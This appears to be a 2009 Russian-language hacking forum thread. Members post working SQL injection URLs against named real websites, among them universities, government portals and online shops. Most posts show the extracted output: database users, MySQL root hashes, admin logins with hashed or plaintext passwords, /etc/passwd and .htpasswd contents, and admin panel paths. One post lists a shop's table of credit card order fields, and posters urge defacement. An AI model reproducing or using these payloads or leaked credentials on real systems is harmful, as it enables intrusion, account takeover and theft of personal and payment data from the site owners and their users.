http://kievrealtor.org.ua/news.php?id=-3+UNION+SELECT+1,concat(username,0x3a,pass),3,4+fr om+user+limit+0,1
vitalik:96656904e7aa6bf36b726ad9b93f13c6a81636ed

С правами:

=
zno-kharkiv.org.ua/news.php?id=-3+UNION+SELECT+1,2
http://zno-kharkiv.org.ua/news.php?id=-3+UNION+SELECT+1,file_priv+from+mysql.user
file_priv=Y
user()
siteuser@zno-kharkiv.org.ua
http://zno-kharkiv.org.ua/news.php?id=-3+UNION+SELECT+1,file_priv+from+mysql.user+where+u ser='siteuser'
file_priv=Y

ЗЫ vitalik:96656904e7aa6bf36b726ad9b93f13c6a81636ed
43 символа, что за хэш, я таких невстречал ?

R1dex

18.02.2009, 06:45

Game Happy - Счастливые игры :-)

gamehappy.ru/games/logic'+or+ascii(substring((select+table_name+from+ information_schema.tables+limit+17,1),1,1))%3E'1/

$n@ke

18.02.2009, 13:25

обед
http://mis.lenoircc.edu/calendar/showevent.php3?id=-22740'+union+select+1,2,3,load_file('/etc/passwd'),5,6,7,8,9,10,11,12,13,14,15/*
Version:4.0.16
Dbname:wabash
User: root@localhost
$hostname = 'localhost';
$user = 'root';
$pass = 'rusty1';

Вперёёёдд, дефейсеры и другие дебилы...

зы: я потом логи просмотрю и выложу в болталке ;-)

spherics

18.02.2009, 14:19

PageRank = 7

http://www.mbl.edu/marine_org/flescher/flescher.php?func=detail&id=206875871+union+select+concat_ws(0x3a,version() ,user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52--

Database Version: 5.0.7-beta-standard
Database name: flescher
User name: root@hermes.mbl.edu

http://www.mbl.edu/marine_org/flescher/flescher.php?func=detail&id=206875871+union+select+concat_ws(0x3a,user,pass word),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,1 9,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35, 36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52 +from+mysql.user--

root : 475bf8887babd6b6

Читаем /etc/passwd

http://www.mbl.edu/marine_org/flescher/flescher.php?func=detail&id=206875871+UNION+SELECT+CONCAT(0x3a,LOAD_FILE(0x 2F6574632F706173737764),0x3a),2,3,4,5,6,7,8,9,10,1 1,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27, 28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44 ,45,46,47,48,49,50,51,52--

Kraneg

18.02.2009, 14:24

ci.bartlesville.ok.us - PR1 =\
http://www.ci.bartlesville.ok.us/page.php?page=-1183+UNION+SELECT+1,2,concat_ws(0x3a,version(),use r(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,1 7/*
DB_Ver: 4.0.27-max-log
DB_User: pendergraphics@68.178.254.114
DB: pendergraphics
Дальше поверхностно глянул ничего интересного =((

spherics

18.02.2009, 14:37

http://dvaction.northwestern.edu/categorybrowse.php?id=4798798654+union+select+1,2, 3,4,concat_ws(0x3a,version(),user(),database())--

Database Version: 5.0.27
Database name: dvaction
User name: ro@localhost

molotovkeyt

18.02.2009, 14:54

Замечательная студия невероятного дизайна )):
http://www.avestudio.ru/?pg=7&id=49&iDsub=48
Практически все сайты с дырявым мускулем. Дерзайте.

spherics

18.02.2009, 15:19

PageRank = 6

http://www.howtostudy.org/resources_subject.php?id=28098097096550+union+sele ct+1,concat_ws(0x3a,version(),user(),database()),3--

4.1.22
studyskills@localhost
howtostudy

Шопы -) PR = 4

http://www.aromaticsinternational.com/search-results.php?nav=other&cat=3809809708976+union+select+1,concat_ws(0x3a,ve rsion(),user(),database()),3,4,5,6--

Database Version: 5.0.32-Debian_7etch8-log
Database name: aromatics
User name: aromatics@localhost

Администраторы:

http://www.aromaticsinternational.com/search-results.php?nav=other&cat=3809809708976+UNION+SELECT+1,CONCAT(0x3a,(SELE CT+CONCAT(user_ID,0x3a,user_name,0x3a,pass_word)+F ROM+aromatics.admin_users+LIMIT+0,1),0x3a),3,4,5,6--

user_ID : user_name : pass_word

: 1 : corey : 3d01fb21c5a7b2995b4c0bc263d90784
: 3 : andrea : 478884f1d0e0c32d0a9a0f1a32ab1acb
: 5 : maria : a5647dd8e76d815833a0d25d29f74747
: 6 : alexander : c68763c0c7204310ef465cfd4d034441

http://www.cdsp.edu/news_deans.php?id=27987986650+union+select+1,2,con cat_ws(0x3a,version(),user(),database())--

4.1.22-log
vshields@localhost
webb_design

-m0rgan-

18.02.2009, 16:04

http://www.f1links.com/list.php?id=36+union+select+1,2,user,4,pass,6,7,8, 9,10,11,12,13,14+from+users--

Gorev

18.02.2009, 16:13

http://www.tamashyi.ro/arte_martiale.php?ID=3+UNION+SELECT+1,2,AES_DECRYP T(AES_ENCRYPT(CONCAT(0x3a,Version(),Database(),Use r()),0x71),0x71),4

Database Version: 5.0.51a-community
Database name: tamashyi_tamashy
User name: tamashyi_tamashy@localhost

spherics

18.02.2009, 16:34

PageRank = 6

http://www.wscal.edu/bookstore/store/mp3_details.php?id=1373+union+select+1,concat_ws(0 x3a,version(),user(),database()),3,4,5,6,7,8,9,10, 11--

4.0.27-standard
wmsem28_wmsem28@localhost
wmsem28_onlinestore

http://cip.gmu.edu/clib/detail.php?id=72738098097+union+select+1,concat_ws (0x3a,version(),user(),database()),3,4,5,6,7--

4.0.13-log
lawAdmin@localhost
cipp

Kraneg

18.02.2009, 18:31

icgadget.ca
http://www.icgadget.ca/shop.php?Cat_ID=19&SubCat_ID=-28+UNION+SELECT+1,2,concat_ws(0x3a,version(),datab ase(),user()),4/*
DB_Ver:4.1.22-standard-log
DB:icgadget_icgadget
DB_User:icgadget_icgadge@localhost
Табличка с пользователями customers поля в ней:
email
password
пример запроса:
http://www.icgadget.ca/shop.php?Cat_ID=19&SubCat_ID=-28+UNION+SELECT+1,2,concat_ws(0x3a,email,password) ,4+from+customers+limit+0,1/*
пароли ничем не шифрованны =)

Gorev

18.02.2009, 19:09

http://www.pet-world.ro/h_produs.php?kid=113&pid=-111+UNION+SELECT+concat_ws(0x3a,version(),database (),user()),2,3,4,5,6--

Database Version: 5.0.32-Debian_7etch1~bpo.1-log
Database name: resocom_petworld
User name: resocom_petworld@supremecenter49.com

f1ng3r

18.02.2009, 20:33

http://www.eurosfaire.prd.fr/news/consulter.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(),user()),3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17--

Database Version : 4.0.24_Debian-10sarge3-log
Database name : eurosfaire
User name : eurosfaire@granit

----------------------------------------------------------+

http://www.poker-carredas.com/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version(),database(),user()),4,5,6,7,8,9, 10,11--

Database Version : 4.0.25-standard-log
Database name : pokercar
User name : pokercar@10.0.75.134

----------------------------------------------------------+

http://fr.apa.az/news.php?id=-1+union+select+1,2,concat _ws(0x3a,version() ,database(),user()),4,5,6,7,8,9,10,11,12,13--

Database Version : 5.0.67-community
Database name : apaadm_fr
User name : apaadm_user@localhost

..::TROYAN::..

18.02.2009, 20:59

http://www.stroyportal.su/production.php?comp_id=-4740+union+select+concat_ws(0x3a,user(),database() ,version())--
stroyportal@localhost:stroyportal:4.1.22-log
PR:5
ТиЦ:425
p.s вывод инфы в title.

Gorev

18.02.2009, 22:07

http://www.ior.ro/produse/index.php?kCtg=9&ID=-48+union+select+1,2,3,4,5,6,7,convert(concat_ws(0x 3a,version(),database(),user())+using+binary),9,0--

Version : 4.1.11-Debian_4sarge7-log
Database : dbior
User : ior@localhost

M.W.N.N.

18.02.2009, 22:21

http://doska.minsk-in.net/showit.php?podrobnoid=5416%27+union+select+1,2,3,v ersion(),5,6,7,8,9,10,11,12,13,14,15/*

Version : 4.1.22-log
Database : minskin9_new
User : minskin9_admin@localhost

http://www.ourkids.net/news/article.php?nid=50%27+union+select+1,version(),3,4 ,5,6,7,8,9,10,11,12+limit+1,1/*

Version : 4.1.20
Database : News
User : webuser@localhost

Kraneg

18.02.2009, 22:25

research.ohiou.edu
http://www.research.ohiou.edu/index.php?section=5&page=-230+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,8,9,10,11,12,13,14/*
DB_Ver:4.1.19-log
DB_User:mediabrite@research.ohiou.edu
DB:vpresearch

Gorev

18.02.2009, 22:37

http://www.mimteam.ro/index.php?page=3&cat=44+AND+ASCII(SUBSTRING((select+user()),1,1))>80

Version : 5.0.67-community
Database : rmim3903_mimteam
User : rmim3902@localhost

18.02.2009, 22:42

QWERTY cms lite
http://lacoste-house.org.ua/index.php?act=cat&id=-3+UNION+SELECT+1,2,3,4,concat(pass459khyf,0x3a,sec ret873ktlW)+from+rkh8t5po
bpS4B1mq:z56Ntrtlkjbgnticlg1
реальный логин:пароль
admin:bpS4B1mq
Админка:
http://lacoste-house.org.ua/admin/index.php
=
Таже кмс:
http://scotland.org.ua/index.php?act=publ&id=-3+UNION+SELECT+1,2,3,4,5
admin:paLz5C9qm1

http://apeu.org.ua/?id=-3+UNION+SELECT+1,2,3,4,5,6/*
5.0.41
user> name:pass
yyedit:tylj27.hf
admin> username:password
Невывело

И еще 2 левые скулины:
www.letradecanciones.biz/index.php?search=artistname&id=-3003+UNION+SELECT+1
www.ngo-perspektiva.org.ua/?type=page&id=-3+UNION+SELECT+1,2,3,4,5,6

..::TROYAN::..

18.02.2009, 22:48

http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on(),database()),6,7,8,9,10--
u23474@78.108.84.11:5.0.67:b23474
PR:1
http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,table_name,6,7,8,9,10+from+ information_schema.tables+limit+0,1--
http://www.vavilon.info/commodity.php?commid=-1+union+select+1,2,3,4,concat(name,0x3a,password), 6,7,8,9,10+from+users--
gold:569874123

p.s/ админку ненашел,а точнее толком неискал
p.s.s вобще студия делает сайты на дырявой cms,там админка во всех по адресу /admin

faza02

18.02.2009, 22:55

http://www.flightweb.com/filemgmt/singlefile.php?lid=-7+union+select+1,2,version(),4,5,6,7,8,9,10,11,12, 13,14,15,16--
5.0.67-log

Gorev

18.02.2009, 23:03

http://www.tabeleelectronice.ro/detail.php?id=-701+UNION+SELECT+1,2,3,4,5,6,concat_ws(0x3a,versio n(),database(),user()),8,9,10,11,12,13,14,15,16,17 ,18&idcat=138

Database Version: 4.1.22-standard
Database name: radu_tabele
User name: radu_cips@localhost

M.W.N.N.

18.02.2009, 23:21

http://www.trade.gov.cn/selloffers.php?cid=272+union+select+1,2,version(), 4,5,6,7,8,9,10

Database Version: 5.0.45-log
Database name: trade_ec_b2b_export
User name: trade_ec@192.168.100.10

Kraneg

18.02.2009, 23:50

cfs.bc.ca - PR6
http://www.cfs.bc.ca/general.php?id=-15+UNION+SELECT+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9,10,11/*
DB_Ver:5.0.45-log
DB_User:cfsbc_2005@localhost
DB:cfsbc_2005
Админка:
http://www.cfs.bc.ca/admin/
прочитал все что было мне в бд доступно, но пользователей не нашел :(

================================================== =======================

cjsf.ca - PR5
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,version(),user(),da tabase()),2,3,4,5,6,7,8,9--
DB_Ver:5.1.28-rc
DB_User: php@localhost
DB:cjsfsite
mysql.user
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+concat_ws(0x3a,user,password),2,3, 4,5,6,7,8,9+from+mysql.user--
root:474b96d173b7c3b8
Читаем /etc/passwd
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f6574632f706173737764 ),2,3,4,5,6,7,8,9--
Админка тут(но как видим basic аторизация)
http://www.cjsf.ca/admin/
Сейчас поправим наше положение =) мы знаем где админка и знаем что нужно посмотреть где находится файл с паролями, а он в свою очередь прописан в .htaccess:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f7765622f636a 73662f61646d696e2f2e6874616363657373),2,3,4,5,6,7, 8,9--
Видим что наш файл по адресу:
/usr/local/etc/apache22/htusers
Читаем:
http://www.cjsf.ca/pguide/rss.php?ID=-50+UNION+SELECT+LOAD_FILE(0x2f7573722f6c6f63616c2f 6574632f61706163686532322f68747573657273),2,3,4,5, 6,7,8,9--
И видим:
cjsf:E4DngOk3FmdhI
Вроде все =)

f1ng3r

19.02.2009, 01:56

PR - 6

http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a,version(),database(), user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16--

Database Version : 5.0.45
Database name : wawwd_main
User name : wawwd_main@localhost

берем юзверей:

http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a ,id,email,pwd),3,4,5,6,7,8,9,10,11,12,13,14,15,16+ from+iLogin+limit+0,1--

и админа:

http://www.wearewhatwedo.org/news/display.php?id=-1+union+select+1,concat _ws(0x3a, id,admin_user_name,admin_password),3,4,5,6,7,8,9,1 0,11,12,13,14,15,16+from+nmail_admin+limit+0,1--

админку не нашёл :mad:

spherics

19.02.2009, 03:47

PageRank = 7

http://www.pace.edu/page.cfm?doc_id=8005%20or%201=@@version--

Microsoft SQL Server 2005 - 9.00.3282.00 (X64) Aug 5 2008 00:48:00 Copyright (c) 1988-2005 Microsoft Corporation Enterprise Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1

http://www.pace.edu/page.cfm?doc_id=8005%20and%20db_name()%3E0--%20and%201=1

Current database is : EmpowerCMS

http://www.pace.edu/page.cfm?doc_id=8005%20and%20user%3E0--%20and%201=1

Current User : webmaster

http://www.colby.edu/news_events/calendar/eventview.cfm?rID=57041&bID=486591%20or%201=@@version--

Microsoft SQL Server 2000 - 8.00.2050 (Intel X86)
Mar 7 2008 21:29:56
Copyright (c) 1988-2003 Microsoft Corporation
Standard Edition on Windows NT 5.2 (Build 3790: Service Pack 2)

http://www.colby.edu/news_events/calendar/eventview.cfm?rID=57041&bID=486591%20and%20db_name()%3E0--%20and%201=1

Db Name : EMS

http://www.colby.edu/news_events/calendar/eventview.cfm?rID=57041&bID=486591%20and%20user%3E0--%20and%201=1

Current User : ODBC_User

R3b

19.02.2009, 09:03

http://www.dib.ucg.gr/proswpiko_en.php?id=102+union+select+null,null,nul l,null,concat_ws(0x20,user(),database(),version()) ,null,null,null,null,null,null,null,null,null,null/*

Assembler

19.02.2009, 14:59

http://islamnasledie.ru/news.php?id=-1372%20union%20select%201,2,3,4,group_concat(table _name),6,7,8,9,10,11,12%20from%20information_schem a.tables-- (все таблицы)

http://islamnasledie.ru/news.php?id=-1372%20union%20select%201,2,3,4,concat_ws(0x3a,use rname,password),6,7,8,9,10,11,12%20from%20auth-- (админские данные)

http://islamnasledie.ru/admin (Админка)

admin:269b9cbb1485e341 (Логин:П ароль)

PS: Че за кодировка у пароля?? Подскажите пожалуйста. С меня +

Rubaka

19.02.2009, 16:00

http://www.petazon.com/cat.php?niccer=124+union+select+1,22222,3,4,5,6666 6,7,8,9999,10,11+limit+1,1/*

Database Version: 4.0.27-standard
Database name: petazon_pet
User name: petazon_pet@localhost

http://www.pristinemodels.dk/page.php?id=-2+union+select+1,version(),3/*

Database Version: 5.0.32-Debian_7etch8-log
Database name: pristinemodels_
User name: pristinemodels_@srv82.one.com

2 Assembler

хэш MySQL:269b9cbb1485e341:RoSin28

Assembler

19.02.2009, 16:04

http://www.ttfinance.ru/news.php?id=-4346%20union%20select%20group_concat(table_name)%2 0from%20information_schema.t

ables-- (все таблцы, смотреть исходный код)

http://www.ttfinance.ru/news.php?id=-4346%20union%20select%20concat_ws(0x3a,ID,username ,realname,email,password)%20

from%20mantis_user_table-- (Админские данные)

http://www.ttfinance.ru/admin.php (Админка)

1:administrator::im@tt-agency.ru:074eec0da3d9dcc8e6e8df8cfe566050 (расшифровать не смог)

PR=5
ТиЦ=200

Rubaka, спс репу позже поставлю, щас не могу =)

B1ade

19.02.2009, 19:12

http://clubinfo.news.at/xxx.php?id_loc=99999999+union+select+1,2,3,4,conca t(nick,char(58),pw),6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26+from+adminuser/*
http://www.light-inc.com/news.php?$pn=30&$catid=99999+union+select+1,2,version()/*
4.1.22-standard
http://pacificretail.com/news.php?catID=9999+union+select+1,2,version(),4,5 ,6,7,8/*

4.0.27-standard

spherics

19.02.2009, 21:16

http://products.weather.gov/detail.php?selrow=5798798695443+union+select+conca t_ws(0x3a,version(),user(),database()),2,3,4,5,6,7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41 ,42,43,44,45,46,47,48,49--

Version: 5.0.45
User: mtsmith@localhost
Database: PDD

http://products.weather.gov/detail.php?selrow=5798798695443+union+select+conca t_ws(0x3a,user,password),2,3,4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,4 6,47,48,49+from+mysql.user--

root : 248c0cc52235aa89

Kraneg

19.02.2009, 21:23

goxgo.ca - PR6
http://www.goxgo.ca/article.php?nid=-483+UNION+SELECT+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8--
Админка:
http://www.goxgo.ca/admin/
Логин и пароль не знаем, поправим ситуацию:
http://www.goxgo.ca/article.php?nid=-483+UNION+SELECT+1,concat_ws(0x3a,username,passwor d),3,4,5,6,7,8+FROM+user--
Вот уже есть логин и пасс:
krista_mckenna:4c1ccfb29d89aaa4746cf7dfb40a28ce
================================================== ==============================
findmespot.ca - PR4
http://findmespot.ca/en/index.php?cid=-1110+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user(), database(),version())/*
DB_User:webuser@localhost
DB:Web_SPOT_GCAN
DB_Ver:4.0.20-standard
Достаем пользователя из mysql.user
http://findmespot.ca/en/index.php?cid=-1110+UNION+SELECT+1,2,3,4,5,concat_ws(0x3a,user,pa ssword)+from+mysql.user/*

root:67c4db4730111611
и так далее =)

Извиняйте за боян maineservicecommission.gov... надо было быть повнимательнее и перепроверить =\

R3b

19.02.2009, 23:12

http://www.ldk.gr/expertise.php?id=1++union+select+null,null,null,co ncat_ws(0x20,user(),database(),version()),null/*

ldk_gr@localhost ldk_gr 5.0.22-log

faza02

19.02.2009, 23:47

http://stefanboulter.com/single.php?id=-82+union+select+1,2,3,version(),5,6,7,8,9--

5.0.67-log

Assembler

20.02.2009, 00:47

http://www.argued.ru
PR: 4
Тиц: 10
Версия: 5.0.67-log
База данных: u29980
Юзверь: u29980@10.10.153.164
http://www.argued.ru/news.php?id=-1%20union%20select%201,2,concat_ws(0x3a,LOGIN,PASS WORD),4,5,6,7,8,9,10,11,12%20from%20b_user%20--
Админка: http://argued.ru/admin/
Логин: andreygu
Пароль: e0067c761726972b3f473cdef6313fd9

Ох как клево через мою прогу все делать =)

Rubaka

20.02.2009, 00:59

http://www.phoenixnorthern.co.uk/display.php?pageid=5/**/UNION/**/SELECT/**/1,user(),3,version(),5,6,7,8,9,10,11,12,13,14,15,1 6,17,18,19,20,21/*

phoenix@localhost

4.1.22

M.W.N.N.

20.02.2009, 01:04

http://post.gov.bn/news_arc.php?newsid=10+union+select+1,version(),3, 4+limit+1,1/*

Version: 5.0.24a-standard-log
User: webadmin@192.168.1.206
Database: test

http://www.bridgeportct.gov/_admin/news_detail.php?newsID=258+union+select+1,2,versio n(),4,5+limit+1,1/*

Version: 5.0.41-community-nt-log
User:admin@localhost
Database: bridgeport

-m0rgan-

20.02.2009, 02:18

ПР:4
http://www.wilsonelectronics.com/ViewProduct.php?ID=-123+union+select+1,2,3,4,concat(username,0x3a,user pwd),6,7,8,9,10,11,12,13,14,15,16,17,18+from+siteu sers+--+
логин/пасс:
wilson:c23bde412afe8fd7cf234c9b4cb208a2
---------------------------------------------------------------------
The End!

попугай

20.02.2009, 03:19

http://trovator.combios.es/temas/index.php?np=1&c=-188+union+seLECT+1,concat_ws(0x3a,ID,LOGIN,NAME,PA SSWORD,EMAIL),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50 +from+PLD_USER--

логин - jsenyas: пароль - relevator: мыло - jose@combios.es

путь к админке по понятным причинам выкладывать не буду...кому надо - найдут и так

R1dex

20.02.2009, 06:02

Канал "Кинопоказ".

http://www.kinopokaz.tv/index.php?a=166+and+ascii(substring((select+1+from +site_userlist+limit+1),1,1))%3E1--

kinopokazeditor:4133e372138889e4ef3cb1ac01cb85ed

Gorev

20.02.2009, 11:11

http://www.andonet.ro/Philips_Magic3VoicePPF571_1908+UNION+SELECT+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),dat abase(),user()),17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33+LIMIT+1,1.htm

Version : 5.0.51a-log
Database : andonet_ro_librarie
User : peterfi@192.168.88.1

sabe

20.02.2009, 11:45

georgiasouthern.edu
http://news.georgiasouthern.edu/press-release.php?nid=-61+union+select+1,2,3,4,5,6,7,8,9,10,11,12/*

Gorev

20.02.2009, 14:15

http://www.angelosoft.ro/laptop-fujitsu-siemens-esprimo-mobile-v6535-core-duo-t3200-200ghz-15434-2gb-160gb-dvd-p-4725+UNION+SELECT+1,2,concat_ws(0x3a,version(),dat abase(),user())--%20.html?osCsid=ffde33f340450de06bae3b47a148caf2

Database Version: 5.0.67-community
Database name: angeloso_osc2@localhost
User name: angeloso_osc2

tables
CHARACTER_SETS, COLLATIONS, COLLATION_CHARACTER_SET_APPLICABILITY, COLUMNS, COLUMN_PRIVILEGES, KEY_COLUMN_USAGE, PROFILING, ROUTINES, SCHEMATA, SCHEMA_PRIVILEGES, STATISTICS, TABLES, TABLE_CONSTRAINTS, TABLE_PRIVILEGES, TRIGGERS, USER_PRIVILEGES, VIEWS, address_book, address_format, banners, banners_history, cache, categories, categories_description, configuration, configuration_group, counter, counter_history, countries, currencies, customers, customers_basket, customers_basket_attributes, customers_info, customers_searches, customers_to_extra_fields, cuvant_cheie, extra_fields, extra_fields_info, geo_zones, languages, manufacturers, manufacturers_info, newsletters, orders, orders_products, orders_products_attributes, orders_products_download, orders_status, orders_status_history, orders_total, products, products_attributes, products_attributes_download, products_description, products_extra_fields, products_notifications, products_options, products_options_values, products_options_values_to_products_options, products_to_categories, products_to_products_extra_fields, reviews, reviews_description, sessions, specials, specials1, tax_class, tax_rates, tmp_tax_rates, whos_online, zones, zones_to_geo_zones

column orders
customers_city, customers_postcode, customers_state, customers_country, customers_telephone, customers_email_address, customers_address_format_id, delivery_name, delivery_company, delivery_street_address, delivery_suburb, delivery_city, delivery_postcode, delivery_state, delivery_country, delivery_address_format_id, billing_name, billing_company, billing_street_address, billing_suburb, billing_city, billing_postcode, billing_state, billing_country, billing_address_format_id, payment_method, cc_type, cc_owner, cc_number, cc_expires, last_modified, date_purchased, orders_status, orders_date_finished, currency, currency_value

pinky07

20.02.2009, 17:38

www.playground.ru
Для любителей острых ощущений=)))

http://www.playground.ru/games/-gta_4'+union+select+1,2,3,concat_ws(0x3a,user(),da tabase(),version()),5,6,7,8,9,10,11,12,13,14,15,16 ,17,18,19,20+--+
p.s. вывод в адресной строке

Gorev

20.02.2009, 19:15

http://www.brainzcomputers.ro/index.php?page=detalii_video&chipset=ATI&id_produs=-38+UNION+SELECT+1,2,aes_decrypt(aes_encrypt(concat _ws(0x3a,version(),database(),user()),0x71),0x71), 4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

Database Version: 4.1.11-Debian_4sarge8-log
Database name: ccd_brainz
User name: ccd_brainz@localhost

f1ng3r

20.02.2009, 20:33

http://www.viewtrak.com/about/article.php?id=-1+union+select+1,2,3,4,concat _ws(0x3a,version(),database(),user()),6,7,8,9,10,1 1,12,13,14--

Database Version : 4.1.22-community-n
Database name : viewtrak
User name : view_www@viewtrak-apps.viewtrak.com

админ :

http://www.viewtrak.com/about/article.php?id=-1+union+select+1,2,3,4,concat_ ws(0x3a,user_ name,password),6,7,8,9,10,11,12,13,14+from+users--

admin:admin4viewtrak

админка без авторизации:

http://www.viewtrak.com/admin/en/ index.php

так же в ней можно добавлять файлы ;)

------------------------------------------------------------#
http://www.cite.hku.hk/news.php?category=seminar&id=-1+union+select+1,concat_ws(0x3a,version(),database (), u ser()),3,4,5,6,7,8,9,10,11,12,13,14,15--

Database Version : 5.0.37-log
Database name : cite
User name : citedbo@localhost

админы:

http://www.cite.hku.hk/news.php?category=seminar&id=-1+union+select+1,concat _ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12 ,13,14,15+from+account--

Candy:$1$4iOeog5p$te/NM9ZmknZbtV.uSHFcr1
Bella:$1$rJdba229$9YqG3IApT4Ox9XHwdsgxL/

Parserian

20.02.2009, 21:51

http://spotters.net.ua/file/?id=-1%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,(concat_ws(CHAR(58),CHAR(58),CHAR(58) ,CHAR(58),user(),database(),version())),19,20,21,2 2,23

вывод в строке заголовка
user - spotters_spot@apollo
db - spotters_spot
version - 4.1.22-log

z00MAN

20.02.2009, 21:54

одна скуля, но интересная :)

Недвижимость в Испании :: Costa Real
http://www.costa-real.ru/articlesInfo.php?id=20+union+select+concat(version (),0x3a,user(),0x3a,database()),222,333,444,555,66 6--

вывод - смотрим исходный код :)

user(): costareal.info@10.0.0.13
database(): costareal
version(): 5.0.32-Debian_7etch6-log

PR=4
тИЦ=40

т к 5-ая ветка читаем таблицы
http://www.costa-real.ru/articlesInfo.php?id=20+union+select+table_name,222 ,333,444,555,666+from+information_schema.tables--
дальше сами.

pinky07

21.02.2009, 00:36

www.drumspeech.com известный сайт барабанщиков=)

таблица с юзерами:

http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+table_na me+FROM+information_schema.columns+WHERE+column_na me+like+char(37,108,111,103,105,110,37)+limit+2,1) ,1,1))=117 u
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+table_na me+FROM+information_schema.columns+WHERE+column_na me+like+char(37,108,111,103,105,110,37)+limit+2,1) ,2,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+table_na me+FROM+information_schema.columns+WHERE+column_na me+like+char(37,108,111,103,105,110,37)+limit+2,1) ,3,1))=101 e
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+table_na me+FROM+information_schema.columns+WHERE+column_na me+like+char(37,108,111,103,105,110,37)+limit+2,1) ,4,1))=114 r
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+table_na me+FROM+information_schema.columns+WHERE+column_na me+like+char(37,108,111,103,105,110,37)+limit+2,1) ,5,1))=0

колонка с паролями:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+2,1),1,1))=112 p
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+2,1),2,1))=97 a
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+2,1),3,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+2,1),4,1))=115 s
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+2,1),5,1))=119 w
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+2,1),6,1))=100 d
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+2,1),7,1))=0

колонка с логинами:
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+1,1),1,1))=108 l
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+1,1),2,1))=111 o
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+1,1),3,1))=103 g
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+1,1),4,1))=105 i
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+1,1),5,1))=110 n
http://www.drumspeech.com/topic.php?forum=speech&theme_id=6796+and+ascii(substring((SELECT+column_n ame+FROM+information_schema.columns+WHERE+table_na me=0x75736572+limit+1,1),6,1))=0

админ:
